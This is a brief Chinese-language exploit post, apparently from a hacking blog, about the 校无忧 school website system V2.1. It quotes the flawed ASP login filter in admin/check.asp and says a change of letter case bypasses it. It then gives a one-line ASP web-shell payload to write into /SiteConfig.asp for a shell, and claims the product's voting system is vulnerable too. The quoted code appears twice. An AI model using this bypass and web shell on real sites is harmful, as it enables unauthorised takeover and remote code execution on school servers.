校无忧系统 漏洞

  • A+
所属分类:漏洞时代
摘要

#####################################################################
by Roker
以 校无忧学校网站系统 V 2.1 为例到 admin/check.asp 文件看了下。。
[php]
if request(“action”)=”login” then
Username=trim(request(“admin_name”))
Password=trim(request(“admin_pass”))
end if
If Instr(Username,”or”)<>0 or Instr(Password,”or”)<>0 or Instr(Username,”and”)<>0 or Instr(Password,”and”)<>0Then
response.write ”

没事别搞人家后台,谢谢!
否则一切后果自负!
校无忧-Www.Xiao5u.Com”
else
[/php]
这尼玛在逗我。。?

#####################################################################
by Roker
以 校无忧学校网站系统 V 2.1 为例到 admin/check.asp 文件看了下。。
[php]
if request("action")="login" then
Username=trim(request("admin_name"))
Password=trim(request("admin_pass"))
end if
If Instr(Username,"or")<>0 or Instr(Password,"or")<>0 or Instr(Username,"and")<>0 or Instr(Password,"and")<>0Then
response.write "

没事别搞人家后台,谢谢!
否则一切后果自负!
校无忧-Www.Xiao5u.Com
"
else
[/php]
这尼玛在逗我。。?

大小写绕过,

拿shell:
/SiteConfig.asp 处
"%><%eval(request("r"))%>
写入一句话。
他的 评选投票系统也是如此。

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: